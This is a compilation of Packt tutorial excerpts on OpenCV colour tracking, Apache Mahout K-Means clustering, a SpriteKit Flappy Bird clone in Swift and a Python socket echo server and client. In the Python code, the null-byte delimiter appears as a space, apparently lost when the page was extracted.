image out of the RGB image that was captured. Hue is easier to deal with when trying to capture real world images; for details, refer to http://www.bogotobogo.com/python/OpenCV_Python/python_opencv3_Changing_ColorSpaces_RGB_HSV_HLS.php. threshold_img = cv2.inRange(hue_image, low_range, high_range): This creates a new image that contains only those pixels that occur between the low_range and high_range n-tuples. contour, hierarchy = cv2.findContours(threshold_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE): This finds the contours, or groups of like pixels, in the threshold_img image. center = contour[0]: This identifies the first contour. moment = cv2.moments(center): This finds the moment of this group of pixels. (x,y),radius = cv2.minEnclosingCircle(center): This gives the x and y locations and the radius of the minimum circle that will enclose this group of pixels. center = (int(x),int(y)): Find the center of the x and y locations. radius = int(radius): The integer radius of the circle. img = cv2.circle(frame,center,radius,(0,255,0),2): Draw a circle on the image. Now that the code is ready, you can run it. You should see something that looks like the following screenshot: You can now track your object. You can modify the color by changing the low_range and high_range n-tuples. You also have the location of your object, so you can use the location to do path planning for your robot. Summary Your biped robot can walk, use sensors to avoid barriers, plans its path, and even see barriers or target. Resources for Article: Further resources on this subject: Develop a Digital Clock [article] Creating Random Insults [article] Raspberry Pi and 1-Wire [article]

0
0
6191

How-To Tutorials

Packt

16 Jun 2015

8 min read

Clustering

Packt

16 Jun 2015

8 min read

In this article by Jayani Withanawasam, author of the book Apache Mahout Essentials, we will see the clustering technique in machine learning and its implementation using Apache Mahout. The K-Means clustering algorithm is explained in detail with both Java and command-line examples (sequential and parallel executions), and other important clustering algorithms, such as Fuzzy K-Means, canopy clustering, and spectral K-Means are also explored. In this article, we will cover the following topics: Unsupervised learning and clustering Applications of clustering Types of clustering K-Means clustering K-Means clustering with MapReduce (For more resources related to this topic, see here.) Unsupervised learning and clustering Information is a key driver for any type of organization. However, with the rapid growth in the volume of data, valuable information may be hidden and go unnoticed due to the lack of effective data processing and analyzing mechanisms. Clustering is an unsupervised learning mechanism that can find the hidden patterns and structures in data by finding data points that are similar to each other. No prelabeling is required. So, you can organize data using clustering with little or no human intervention. For example, let's say you are given a collection of balls of different sizes without any category labels, such as big and small, attached to them; you should be able to categorize them using clustering by considering their attributes, such as radius and weight, for similarity. We will learn how to use Apache Mahout to perform clustering using different algorithms. Applications of clustering Clustering has many applications in different domains, such as biology, business, and information retrieval. Computer vision and image processing Clustering techniques are widely used in the computer vision and image processing domain. Clustering is used for image segmentation in medical image processing for computer aided disease (CAD) diagnosis. One specific area is breast cancer detection. In breast cancer detection, a mammogram is clustered into several parts for further analysis, as shown in the following image. The regions of interest for signs of breast cancer in the mammogram can be identified using the K-Means algorithm. Image features such as pixels, colors, intensity, and texture are used during clustering: Types of clustering Clustering can be divided into different categories based on different criteria. Hard clustering versus soft clustering Clustering techniques can be divided into hard clustering and soft clustering based on the cluster's membership. In hard clustering, a given data point in n-dimensional space only belongs to one cluster. This is also known as exclusive clustering. The K-Means clustering mechanism is an example of hard clustering. A given data point can belong to more than one cluster in soft clustering. This is also known as overlapping clustering. The Fuzzy K-Means algorithm is a good example of soft clustering. A visual representation of the difference between hard clustering and soft clustering is given in the following figure: Flat clustering versus hierarchical clustering In hierarchical clustering, a hierarchy of clusters is built using the top-down (divisive) or bottom-up (agglomerative) approach. This is more informative and accurate than flat clustering, which is a simple technique where no hierarchy is present. However, this comes at the cost of performance, as flat clustering is faster and more efficient than hierarchical clustering. For example, let's assume that you need to figure out T-shirt sizes for people of different sizes. Using hierarchal clustering, you can come up with sizes for small (s), medium (m), and large (l) first by analyzing a sample of the people in the population. Then, we can further categorize this as extra small (xs), small (s), medium, large (l), and extra large (xl) sizes. Model-based clustering In model-based clustering, data is modeled using a standard statistical model to work with different distributions. The idea is to find a model that best fits the data. The best-fit model is achieved by tuning up parameters to minimize loss on errors. Once the parameter values are set, probability membership can be calculated for new data points using the model. Model-based clustering gives a probability distribution over clusters. K-Means clustering K-Means clustering is a simple and fast clustering algorithm that has been widely adopted in many problem domains. We will give a detailed explanation of the K-Means algorithm, as it will provide the base for other algorithms. K-Means clustering assigns data points to k number of clusters (cluster centroids) by minimizing the distance from the data points to the cluster centroids. Let's consider a simple scenario where we need to cluster people based on their size (height and weight are the selected attributes) and different colors (clusters): We can plot this problem in two-dimensional space, as shown in the following figure and solve it using the K-Means algorithm: Getting your hands dirty! Let's move on to a real implementation of the K-Means algorithm using Apache Mahout. The following are the different ways in which you can run algorithms in Apache Mahout: Sequential MapReduce You can execute the algorithms using a command line (by calling the correct bin/mahout subcommand) or using Java programming (calling the correct driver's run method). Running K-Means using Java programming This example continues with the people-clustering scenario mentioned earlier. The size (weight and height) distribution for this example has been plotted in two-dimensional space, as shown in the following image: Data preparation First, we need to represent the problem domain as numerical vectors. The following table shows the size distribution of people mentioned in the previous scenario: Weight (kg) Height (cm) 22 80 25 75 28 85 55 150 50 145 53 153 Save the following content in a file named KmeansTest.data: 22 80 25 75 28 85 55 150 50 145 53 153 Understanding important parameters Let's take a look at the significance of some important parameters: org.apache.hadoop.fs.Path: This denotes the path to a file or directory in the filesystem. org.apache.hadoop.conf.Configuration: This provides access to Hadoop-related configuration parameters. org.apache.mahout.common.distance.DistanceMeasure: This determines the distance between two points. K: This denotes the number of clusters. convergenceDelta: This is a double value that is used to determine whether the algorithm has converged. maxIterations: This denotes the maximum number of iterations to run. runClustering: If this is true, the clustering step is to be executed after the clusters have been determined. runSequential: If this is true, the K-Means sequential implementation is to be used in order to process the input data. The following code snippet shows the source code: private static final String DIRECTORY_CONTAINING_CONVERTED_INPUT ="Kmeansdata";public static void main(String[] args) throws Exception {// Path to output folderPath output = new Path("Kmeansoutput");// Hadoop configuration detailsConfiguration conf = new Configuration();HadoopUtil.delete(conf, output);run(conf, new Path("KmeansTest"), output, newEuclideanDistanceMeasure(), 2, 0.5, 10);}public static void run(Configuration conf, Path input, Pathoutput, DistanceMeasure measure, int k,double convergenceDelta, int maxIterations) throws Exception {// Input should be given as sequence file formatPath directoryContainingConvertedInput = new Path(output,DIRECTORY_CONTAINING_CONVERTED_INPUT);InputDriver.runJob(input, directoryContainingConvertedInput,"org.apache.mahout.math.RandomAccessSparseVector");// Get initial clusters randomlyPath clusters = new Path(output, "random-seeds");clusters = RandomSeedGenerator.buildRandom(conf,directoryContainingConvertedInput, clusters, k, measure);// Run K-Means with a given KKMeansDriver.run(conf, directoryContainingConvertedInput,clusters, output, convergenceDelta,maxIterations, true, 0.0, false);// run ClusterDumper to display resultPath outGlob = new Path(output, "clusters-*-final");Path clusteredPoints = new Path(output,"clusteredPoints");ClusterDumper clusterDumper = new ClusterDumper(outGlob,clusteredPoints);clusterDumper.printClusters(null);} Use the following code example in order to get a better (readable) outcome to analyze the data points and the centroids they are assigned to: Reader reader = new SequenceFile.Reader(fs,new Path(output,Cluster.CLUSTERED_POINTS_DIR + "/part-m-00000"), conf);IntWritable key = new IntWritable();WeightedPropertyVectorWritable value = newWeightedPropertyVectorWritable();while (reader.next(key, value)) {System.out.println("key: " + key.toString()+ " value: "+value.toString());}reader.close(); After you run the algorithm, you will see the clustering output generated for each iteration and the final result in the filesystem (in the output directory you have specified; in this case, Kmeansoutput). Summary Clustering is an unsupervised learning mechanism that requires minimal human effort. Clustering has many applications in different areas, such as medical image processing, market segmentation, and information retrieval. Clustering mechanisms can be divided into different types, such as hard, soft, flat, hierarchical, and model-based clustering based on different criteria. Apache Mahout implements different clustering algorithms, which can be accessed sequentially or in parallel (using MapReduce). The K-Means algorithm is a simple and fast algorithm that is widely applied. However, there are situations that the K-Means algorithm will not be able to cater to. For such scenarios, Apache Mahout has implemented other algorithms, such as canopy, Fuzzy K-Means, streaming, and spectral clustering. Resources for Article: Further resources on this subject: Apache Solr and Big Data – integration with MongoDB [Article] Introduction to Apache ZooKeeper [Article] Creating an Apache JMeter™ test workbench [Article]

0
0
2887

Packt

16 Jun 2015

15 min read

Flappy Swift

Packt

16 Jun 2015

15 min read

Let's start using the first framework by implementing a nice clone of Flappy Bird with the help of this article by Giordano Scalzo, the author of Swift by Example. (For more resources related to this topic, see here.) The app is… Only someone who has been living under a rock for the past two years may not have heard of Flappy Bird, but to be sure that everybody understands the game, let's go through a brief introduction. Flappy Bird is a simple, but addictive, game where the player controls a bird that must fly between a series of pipes. Gravity pulls the bird down, but by touching the screen, the player can make the bird flap and move towards the sky, driving the bird through a gap in a couple of pipes. The goal is to pass through as many pipes as possible. Our implementation will be a high-fidelity tribute to the original game, with the same simplicity and difficulty level. The app will consist of only two screens—a clean menu screen and the game itself—as shown in the following screenshot: Building the skeleton of the app Let's start implementing the skeleton of our game using the SpriteKit game template. Creating the project For implementing a SpriteKit game, Xcode provides a convenient template, which prepares a project with all the useful settings: Go to New| Project and select the Game template, as shown in this screenshot: In the following screen, after filling in all the fields, pay attention and select SpriteKit under Game Technology, like this: By running the app and touching the screen, you will be delighted by the cute, rotating airplanes! Implementing the menu First of all, let's add CocoaPods; write the following code in the Podfile: use_frameworks! target 'FlappySwift' do pod 'Cartography', '~> 0.5' pod 'HTPressableButton', '~> 1.3' end Then install CocoaPods by running the pod install command. As usual, we are going to implement the UI without using Interface Builder and the storyboards. Go to AppDelegate and add these lines to create the main ViewController: func application(application: UIApplication, didFinishLaunchingWithOptions launchOptions: [NSObject: AnyObject]?) -> Bool { let viewController = MenuViewController() let mainWindow = UIWindow(frame: UIScreen.mainScreen().bounds) mainWindow.backgroundColor = UIColor.whiteColor() mainWindow.rootViewController = viewController mainWindow.makeKeyAndVisible() window = mainWindow return true } The MenuViewController, as the name suggests, implements a nice menu to choose between the game and the Game Center: import UIKit import HTPressableButton import Cartography class MenuViewController: UIViewController { private let playButton = HTPressableButton(frame: CGRectMake(0, 0, 260, 50), buttonStyle: .Rect) private let gameCenterButton = HTPressableButton(frame: CGRectMake(0, 0, 260, 50), buttonStyle: .Rect) override func viewDidLoad() { super.viewDidLoad() setup() layoutView() style() render() } } As you can see, we are using the usual structure. Just for the sake of making the UI prettier, we are using HTPressableButtons instead of the default buttons. Despite the fact that we are using AutoLayout, the implementation of this custom button requires that we instantiate the button by passing a frame to it: // MARK: Setup private extension MenuViewController{ func setup(){ playButton.addTarget(self, action: "onPlayPressed:", forControlEvents: .TouchUpInside) view.addSubview(playButton) gameCenterButton.addTarget(self, action: "onGameCenterPressed:", forControlEvents: .TouchUpInside) view.addSubview(gameCenterButton) } @objc func onPlayPressed(sender: UIButton) { let vc = GameViewController() vc.modalTransitionStyle = .CrossDissolve presentViewController(vc, animated: true, completion: nil) } @objc func onGameCenterPressed(sender: UIButton) { println("onGameCenterPressed") } } The only thing to note is that, because we are setting the function to be called when the button is pressed using the addTarget() function, we must prefix the designed methods using @objc. Otherwise, it will be impossible for the Objective-C runtime to find the correct method when the button is pressed. This is because they are implemented in a private extension; of course, you can set the extension as internal or public and you won't need to prepend @objc to the functions: // MARK: Layout extension MenuViewController{ func layoutView() { layout(playButton) { view in view.bottom == view.superview!.centerY - 60 view.centerX == view.superview!.centerX view.height == 80 view.width == view.superview!.width - 40 } layout(gameCenterButton) { view in view.bottom == view.superview!.centerY + 60 view.centerX == view.superview!.centerX view.height == 80 view.width == view.superview!.width - 40 } } } The layout functions simply put the two buttons in the correct places on the screen: // MARK: Style private extension MenuViewController{ func style(){ playButton.buttonColor = UIColor.ht_grapeFruitColor() playButton.shadowColor = UIColor.ht_grapeFruitDarkColor() gameCenterButton.buttonColor = UIColor.ht_aquaColor() gameCenterButton.shadowColor = UIColor.ht_aquaDarkColor() } } // MARK: Render private extension MenuViewController{ func render(){ playButton.setTitle("Play", forState: .Normal) gameCenterButton.setTitle("Game Center", forState: .Normal) } } Finally, we set the colors and text for the titles of the buttons. The following screenshot shows the complete menu: You will notice that on pressing Play, the app crashes. This is because the template is using the view defined in storyboard, and we are directly using the controllers. Let's change the code in GameViewController: class GameViewController: UIViewController { private let skView = SKView() override func viewDidLoad() { super.viewDidLoad() skView.frame = view.bounds view.addSubview(skView) if let scene = GameScene.unarchiveFromFile("GameScene") as? GameScene { scene.size = skView.frame.size skView.showsFPS = true skView.showsNodeCount = true skView.ignoresSiblingOrder = true scene.scaleMode = .AspectFill skView.presentScene(scene) } } } We are basically creating the SKView programmatically, and setting its size just as we did for the main view's size. If the app is run now, everything will work fine. You can find the code for this version at https://github.com/gscalzo/FlappySwift/tree/the_menu_is_ready. A stage for a bird Let's kick-start the game by implementing the background, which is not as straightforward as it might sound. SpriteKit in a nutshell SpriteKit is a powerful, but easy-to-use, game framework introduced in iOS 7. It basically provides the infrastructure to move images onto the screen and interact with them. It also provides a physics engine (based on Box2D), a particles engine, and basic sound playback support, making it particularly suitable for casual games. The content of the game is drawn inside an SKView, which is a particular kind of UIView, so it can be placed inside a normal hierarchy of UIViews. The content of the game is organized into scenes, represented by subclasses of SKScene. Different parts of the game, such as the menu, levels, and so on, must be implemented in different SKScenes. You can consider an SK in SpriteKit as an equivalent of the UIViewController. Inside an SKScene, the elements of the game are grouped in the SKNode's tree which tells the SKScene how to render the components. An SKNode can be either a drawable node, such as SKSpriteNode or SKShapeNode; or something to be applied to the subtree of its descendants, such as SKEffectNode or SKCropNode. Note that SKScene is an SKNode itself. Nodes are animated using SKAction. An SKAction is a change that must be applied to a node, such as a move to a particular position, a change of scaling, or a change in the way the node appears. The actions can be grouped together to create actions that run in parallel, or wait for the end of a previous action. Finally, we can define physics-based relations between objects, defining mass, gravity, and how the nodes interact with each other. That said, the best way to understand and learn SpriteKit is by starting to play with it. So, without further ado, let's move on to the implementation of our tiny game. In this way, you'll get a complete understanding of the most important features of SpriteKit. Explaining the code In the previous section, we implemented the menu view, leaving the code similar to what was created by the template. With basic knowledge of SpriteKit, you can now start understanding the code: class GameViewController: UIViewController { private let skView = SKView() override func viewDidLoad() { super.viewDidLoad() skView.frame = view.bounds view.addSubview(skView) if let scene = GameScene.unarchiveFromFile("GameScene") as? GameScene { scene.size = skView.frame.size skView.showsFPS = true skView.showsNodeCount = true skView.ignoresSiblingOrder = true scene.scaleMode = .AspectFill skView.presentScene(scene) } } } This is the UIViewController that starts the game; it creates an SKView to present the full screen. Then it instantiates the scene from GameScene.sks, which can be considered the equivalent of a Storyboard. Next, it enables some debug information before presenting the scene. It's now clear that we must implement the game inside the GameScene class. Simulating a three-dimensional world using parallax To simulate the depth of the in-game world, we are going to use the technique of parallax scrolling, a really popular method wherein the farther images on the game screen move slower than the closer images. In our case, we have three different levels, and we'll use three different speeds: Before implementing the scrolling background, we must import the images into our project, remembering to set each image as 2x in the assets. The assets can be downloaded from https://github.com/gscalzo/FlappySwift/blob/master/assets.zip?raw=true. The GameScene class basically sets up the background levels: import SpriteKit class GameScene: SKScene { private var screenNode: SKSpriteNode! private var actors: [Startable]! override func didMoveToView(view: SKView) { screenNode = SKSpriteNode(color: UIColor.clearColor(), size: self.size) addChild(screenNode) let sky = Background(textureNamed: "sky", duration:60.0).addTo(screenNode) let city = Background(textureNamed: "city", duration:20.0).addTo(screenNode) let ground = Background(textureNamed: "ground", duration:5.0).addTo(screenNode) actors = [sky, city, ground] for actor in actors { actor.start() } } } The only implemented function is didMoveToView(), which can be considered the equivalent of viewDidAppear for a UIVIewController. We define an array of Startable objects, where Startable is a protocol for making the life cycle of the scene, uniform: import SpriteKit protocol Startable { func start() func stop() } This will be handy for giving us an easy way to stop the game later, when either we reach the final goal or our character dies. The Background class holds the behavior for a scrollable level: import SpriteKit class Background { private let parallaxNode: ParallaxNode private let duration: Double init(textureNamed textureName: String, duration: Double) { parallaxNode = ParallaxNode(textureNamed: textureName) self.duration = duration } func addTo(parentNode: SKSpriteNode) -> Self { parallaxNode.addTo(parentNode) return self } } As you can see, the class saves the requested duration of a cycle, and then it forwards the calls to a class called ParallaxNode: // Startable extension Background : Startable { func start() { parallaxNode.start(duration: duration) } func stop() { parallaxNode.stop() } } The Startable protocol is implemented by forwarding the methods to ParallaxNode. How to implement the scrolling The idea of implementing scrolling is really straightforward: we implement a node where we put two copies of the same image in a tiled format. We then place the node such that we have the left half fully visible. Then we move the entire node to the left until we fully present the left node. Finally, we reset the position to the original one and restart the cycle. The following figure explains this algorithm: import SpriteKit class ParallaxNode { private let node: SKSpriteNode! init(textureNamed: String) { let leftHalf = createHalfNodeTexture(textureNamed, offsetX: 0) let rightHalf = createHalfNodeTexture(textureNamed, offsetX: leftHalf.size.width) let size = CGSize(width: leftHalf.size.width + rightHalf.size.width, height: leftHalf.size.height) node = SKSpriteNode(color: UIColor.whiteColor(), size: size) node.anchorPoint = CGPointZero node.position = CGPointZero node.addChild(leftHalf) node.addChild(rightHalf) } func zPosition(zPosition: CGFloat) -> ParallaxNode { node.zPosition = zPosition return self } func addTo(parentNode: SKSpriteNode) -> ParallaxNode { parentNode.addChild(node) return self } } The init() method simply creates the two halves, puts them side by side, and sets the position of the node: // Mark: Private private func createHalfNodeTexture(textureNamed: String, offsetX: CGFloat) -> SKSpriteNode { let node = SKSpriteNode(imageNamed: textureNamed, normalMapped: true) node.anchorPoint = CGPointZero node.position = CGPoint(x: offsetX, y: 0) return node } The half node is just a node with the correct offset for the x-coordinate: // Mark: Startable extension ParallaxNode { func start(#duration: NSTimeInterval) { node.runAction(SKAction.repeatActionForever(SKAction.sequence( [ SKAction.moveToX(-node.size.width/2.0, duration: duration), SKAction.moveToX(0, duration: 0) ] ))) } func stop() { node.removeAllActions() } } Finally, the Startable protocol is implemented using two actions in a sequence. First, we move half the size—which means an image width—to the left, and then we move the node to the original position to start the cycle again. This is what the final result looks like: You can find the code for this version at https://github.com/gscalzo/FlappySwift/tree/stage_with_parallax_levels. Summary This article has given an idea on how to go about direction that you need to build a clone of the Flappy Bird app. For the complete exercise and a lot more, please refer to Swift by Example by Giordano Scalzo. Resources for Article: Further resources on this subject: Playing with Swift [article] Configuring Your Operating System [article] Updating data in the background [article]

0
0
8063

article-image-client-and-server-applications

Packt

16 Jun 2015

27 min read

Client and Server Applications

Packt

16 Jun 2015

27 min read

In this article by, Sam Washington and Dr. M. O. Faruque Sarker, authors of the book Learning Python Network Programming, we're going to use sockets to build network applications. Sockets follow one of the main models of computer networking, that is, the client/server model. We'll look at this with a focus on structuring server applications. We'll cover the following topics: Designing a simple protocol Building an echo server and client (For more resources related to this topic, see here.) The examples in this article are best run on Linux or a Unix operating system. The Windows sockets implementation has some idiosyncrasies, and these can create some error conditions, which we will not be covering here. Note that Windows does not support the poll interface that we'll use in one example. If you do use Windows, then you'll probably need to use ctrl + break to kill these processes in the console, rather than using ctrl - c because Python in a Windows command prompt doesn't respond to ctrl – c when it's blocking on a socket send or receive, which will be quite often in this article! (and if, like me, you're unfortunate enough to try testing these on a Windows laptop without a break key, then be prepared to get very familiar with the Windows Task Manager's End task button). Client and server The basic setup in the client/server model is one device, the server that runs a service and patiently waits for clients to connect and make requests to the service. A 24-hour grocery shop may be a real world analogy. The shop waits for customers to come in and when they do, they request certain products, purchase them and leave. The shop might advertise itself so people know where to find it, but the actual transactions happen while the customers are visiting the shop. A typical computing example is a web server. The server listens on a TCP port for clients that need its web pages. When a client, for example a web browser, requires a web page that the server hosts, it connects to the server and then makes a request for that page. The server replies with the content of the page and then the client disconnects. The server advertises itself by having a hostname, which the clients can use to discover the IP address so that they can connect to it. In both of these situations, it is the client that initiates any interaction – the server is purely responsive to that interaction. So, the needs of the programs that run on the client and server are quite different. Client programs are typically oriented towards the interface between the user and the service. They retrieve and display the service, and allow the user to interact with it. Server programs are written to stay running for indefinite periods of time, to be stable, to efficiently deliver the service to the clients that are requesting it, and to potentially handle a large number of simultaneous connections with a minimal impact on the experience of any one client. In this article, we will look at this model by writing a simple echo server and client, which can handle a session with multiple clients. The socket module in Python perfectly suits this task. An echo protocol Before we write our first client and server programs, we need to decide how they are going to interact with each other, that is we need to design a protocol for their communication. Our echo server should listen until a client connects and sends a bytes string, then we want it to echo that string back to the client. We only need a few basic rules for doing this. These rules are as follows: Communication will take place over TCP. The client will initiate an echo session by creating a socket connection to the server. The server will accept the connection and listen for the client to send a bytes string. The client will send a bytes string to the server. Once it sends the bytes string, the client will listen for a reply from the server When it receives the bytes string from the client, the server will send the bytes string back to the client. When the client has received the bytes string from the server, it will close its socket to end the session. These steps are straightforward enough. The missing element here is how the server and the client will know when a complete message has been sent. Remember that an application sees a TCP connection as an endless stream of bytes, so we need to decide what in that byte stream will signal the end of a message. Framing This problem is called framing, and there are several approaches that we can take to handle it. The main ones are described here: Make it a protocol rule that only one message will be sent per connection, and once a message has been sent, the sender will immediately close the socket. Use fixed length messages. The receiver will read the number of bytes and know that they have the whole message. Prefix the message with the length of the message. The receiver will read the length of the message from the stream first, then it will read the indicated number of bytes to get the rest of the message. Use special character delimiters for indicating the end of a message. The receiver will scan the incoming stream for a delimiter, and the message comprises everything up to the delimiter. Option 1 is a good choice for very simple protocols. It's easy to implement and it doesn't require any special handling of the received stream. However, it requires the setting up and tearing down of a socket for every message, and this can impact performance when a server is handling many messages at once. Option 2 is again simple to implement, but it only makes efficient use of the network when our data comes in neat, fixed-length blocks. For example in a chat server the message lengths are variable, so we will have to use a special character, such as the null byte, to pad messages to the block size. This only works where we know for sure that the padding character will never appear in the actual message data. There is also the additional issue of how to handle messages longer than the block length. Option 3 is usually considered as one of the best approaches. Although it can be more complex to code than the other options, the implementations are still reasonably straightforward, and it makes efficient use of bandwidth. The overhead imposed by including the length of each message is usually minimal as compared to the message length. It also avoids the need for any additional processing of the received data, which may be needed by certain implementations of option 4. Option 4 is the most bandwidth-efficient option, and is a good choice when we know that only a limited set of characters, such as the ASCII alphanumeric characters, will be used in messages. If this is the case, then we can choose a delimiter character, such as the null byte, which will never appear in the message data, and then the received data can be easily broken into messages as this character is encountered. Implementations are usually simpler than option 3. Although it is possible to employ this method for arbitrary data, that is, where the delimiter could also appear as a valid character in a message, this requires the use of character escaping, which needs an additional round of processing of the data. Hence in these situations, it's usually simpler to use length-prefixing. For our echo and chat applications, we'll be using the UTF-8 character set to send messages. The null byte isn't used in any character in UTF-8 except for the null byte itself, so it makes a good delimiter. Thus, we'll be using method 4 with the null byte as the delimiter to frame our messages. So, our last rule which is number 8 will become: Messages will be encoded in the UTF-8 character set for transmission, and they will be terminated by the null byte. Now, let's write our echo programs. A simple echo server As we work through this article, we'll find ourselves reusing several pieces of code, so to save ourselves from repetition, we'll set up a module with useful functions that we can reuse as we go along. Create a file called tincanchat.py and save the following code in it: import socket HOST = '' PORT = 4040 def create_listen_socket(host, port): """ Setup the sockets our server will receive connection requests on """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((host, port)) sock.listen(100) return sock def recv_msg(sock): """ Wait for data to arrive on the socket, then parse into messages using b' ' as message delimiter """ data = bytearray() msg = '' # Repeatedly read 4096 bytes off the socket, storing the bytes # in data until we see a delimiter while not msg: recvd = sock.recv(4096) if not recvd: # Socket has been closed prematurely raise ConnectionError() data = data + recvd if b' ' in recvd: # we know from our protocol rules that we only send # one message per connection, so b' ' will always be # the last character msg = data.rstrip(b' ') msg = msg.decode('utf-8') return msg def prep_msg(msg): """ Prepare a string to be sent as a message """ msg += ' ' return msg.encode('utf-8') def send_msg(sock, msg): """ Send a string over a socket, preparing it first """ data = prep_msg(msg) sock.sendall(data) First we define a default interface and a port number to listen on. The empty '' interface, specified in the HOST variable, tells socket.bind() to listen on all available interfaces. If you want to restrict access to just your machine, then change the value of the HOST variable at the beginning of the code to 127.0.0.1. We'll be using create_listen_socket() to set up our server listening connections. This code is the same for several of our server programs, so it makes sense to reuse it. The recv_msg() function will be used by our echo server and client for receiving messages from a socket. In our echo protocol, there isn't anything that our programs may need to do while they're waiting to receive a message, so this function just calls socket.recv() in a loop until it has received the whole message. As per our framing rule, it will check the accumulated data on each iteration to see if it has received a null byte, and if so, then it will return the received data, stripping off the null byte and decoding it from UTF-8. The send_msg() and prep_msg() functions work together for framing and sending a message. We've separated the null byte termination and the UTF-8 encoding into prep_msg() because we will use them in isolation later on. Handling received data Note that we're drawing ourselves a careful line with these send and receive functions as regards string encoding. Python 3 strings are Unicode, while the data that we receive over the network is bytes. The last thing that we want to be doing is handling a mixture of these in the rest of our program code, so we're going to carefully encode and decode the data at the boundary of our program, where the data enters and leaves the network. This will ensure that any functions in the rest of our code can assume that they'll be working with Python strings, which will later on make things much easier for us. Of course, not all the data that we may want to send or receive over a network will be text. For example, images, compressed files, and music, can't be decoded to a Unicode string, so a different kind of handling is needed. Usually this will involve loading the data into a class, such as a Python Image Library (PIL) image for example, if we are going to manipulate the object in some way. There are basic checks that could be done here on the received data, before performing full processing on it, to quickly flag any problems with the data. Some examples of such checks are as follows: Checking the length of the received data Checking the first few bytes of a file for a magic number to confirm a file type Checking values of higher level protocol headers, such as the Host header in an HTTP request This kind of checking will allow our application to fail fast if there is an obvious problem. The server itself Now, let's write our echo server. Open a new file called 1.1-echo-server-uni.py and save the following code in it: import tincanchat HOST = tincanchat.HOST PORT = tincanchat.PORT def handle_client(sock, addr): """ Receive data from the client via sock and echo it back """ try: msg = tincanchat.recv_msg(sock) # Blocks until received # complete message print('{}: {}'.format(addr, msg)) tincanchat.send_msg(sock, msg) # Blocks until sent except (ConnectionError, BrokenPipeError): print('Socket error') finally: print('Closed connection to {}'.format(addr)) sock.close() if __name__ == '__main__': listen_sock = tincanchat.create_listen_socket(HOST, PORT) addr = listen_sock.getsockname() print('Listening on {}'.format(addr)) while True: client_sock, addr = listen_sock.accept() print('Connection from {}'.format(addr)) handle_client(client_sock, addr) This is about as simple as a server can get! First, we set up our listening socket with the create_listen_socket() call. Second, we enter our main loop, where we listen forever for incoming connections from clients, blocking on listen_sock.accept(). When a client connection comes in, we invoke the handle_client() function, which handles the client as per our protocol. We've created a separate function for this code, partly to keep the main loop tidy, and partly because we'll want to reuse this set of operations in later programs. That's our server, now we just need to make a client to talk to it. A simple echo client Create a file called 1.2-echo_client-uni.py and save the following code in it: import sys, socket import tincanchat HOST = sys.argv[-1] if len(sys.argv) > 1 else '127.0.0.1' PORT = tincanchat.PORT if __name__ == '__main__': while True: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((HOST, PORT)) print('nConnected to {}:{}'.format(HOST, PORT)) print("Type message, enter to send, 'q' to quit") msg = input() if msg == 'q': break tincanchat.send_msg(sock, msg) # Blocks until sent print('Sent message: {}'.format(msg)) msg = tincanchat.recv_msg(sock) # Block until # received complete # message print('Received echo: ' + msg) except ConnectionError: print('Socket error') break finally: sock.close() print('Closed connection to servern') If we're running our server on a different machine from the one on which we are running the client, then we can supply the IP address or the hostname of the server as a command line argument to the client program. If we don't, then it will default to trying to connect to the localhost. The third and forth lines of the code check the command line arguments for a server address. Once we've determined which server to connect to, we enter our main loop, which loops forever until we kill the client by entering q as a message. Within the main loop, we first create a connection to the server. Second, we prompt the user to enter the message to send and then we send the message using the tincanchat.send_msg() function. We then wait for the server's reply. Once we get the reply, we print it and then we close the connection as per our protocol. Give our client and server a try. Run the server in a terminal by using the following command: $ python 1.1-echo_server-uni.py Listening on ('0.0.0.0', 4040) In another terminal, run the client and note that you will need to specify the server if you need to connect to another computer, as shown here: $ python 1.2-echo_client.py 192.168.0.7 Type message, enter to send, 'q' to quit Running the terminals side by side is a good idea, because you can simultaneously see how the programs behave. Type a few messages into the client and see how the server picks them up and sends them back. Disconnecting with the client should also prompt a notification on the server. Concurrent I/O If you're adventurous, then you may have tried connecting to our server using more than one client at once. If you tried sending messages from both of them, then you'd have seen that it does not work as we might have hoped. If you haven't tried this, then give it a go. A working echo session on the client should look like this: Type message, enter to send. 'q' to quit hello world Sent message: hello world Received echo: hello world Closed connection to server However, when trying to send a message by using a second connected client, we'll see something like this: Type message, enter to send. 'q' to quit hello world Sent message: hello world The client will hang when the message is sent, and it won't get an echo reply. You may also notice that if we send a message by using the first connected client, then the second client will get its response. So, what's going on here? The problem is that the server can only listen for the messages from one client at a time. As soon as the first client connects, the server blocks at the socket.recv() call in tincanchat.recv_msg(), waiting for the first client to send a message. The server isn't able to receive messages from other clients while this is happening and so, when another client sends a message, that client blocks too, waiting for the server to send a reply. This is a slightly contrived example. The problem in this case could easily be fixed in the client end by asking the user for an input before establishing a connection to the server. However in our full chat service, the client will need to be able to listen for messages from the server while simultaneously waiting for user input. This is not possible in our present procedural setup. There are two solutions to this problem. We can either use more than one thread or process, or use non-blocking sockets along with an event-driven architecture. We're going to look at both of these approaches, starting with multithreading. Multithreading and multiprocessing Python has APIs that allow us to write both multithreading and multiprocessing applications. The principle behind multithreading and multiprocessing is simply to take copies of our code and run them in additional threads or processes. The operating system automatically schedules the threads and processes across available CPU cores to provide fair processing time allocation to all the threads and processes. This effectively allows a program to simultaneously run multiple operations. In addition, when a thread or process blocks, for example, when waiting for IO, the thread or process can be de-prioritized by the OS, and the CPU cores can be allocated to other threads or processes that have actual computation to do. Here is an overview of how threads and processes relate to each other: Threads exist within processes. A process can contain multiple threads but it always contains at least one thread, sometimes called the main thread. Threads within the same process share memory, so data transfer between threads is just a case of referencing the shared objects. Processes do not share memory, so other interfaces, such as files, sockets, or specially allocated areas of shared memory, must be used for transferring data between processes. When threads have operations to execute, they ask the operating system thread scheduler to allocate them some time on a CPU, and the scheduler allocates the waiting threads to CPU cores based on various parameters, which vary from OS to OS. Threads in the same process may run on separate CPU cores at the same time. Although two processes have been displayed in the preceding diagram, multiprocessing is not going on here, since the processes belong to different applications. The second process is displayed to illustrates a key difference between Python threading and threading in most other programs. This difference is the presence of the GIL. Threading and the GIL The CPython interpreter (the standard version of Python available for download from www.python.org) contains something called the Global Interpreter Lock (GIL). The GIL exists to ensure that only a single thread in a Python process can run at a time, even if multiple CPU cores are present. The reason for having the GIL is that it makes the underlying C code of the Python interpreter much easier to write and maintain. The drawback of this is that Python programs using multithreading 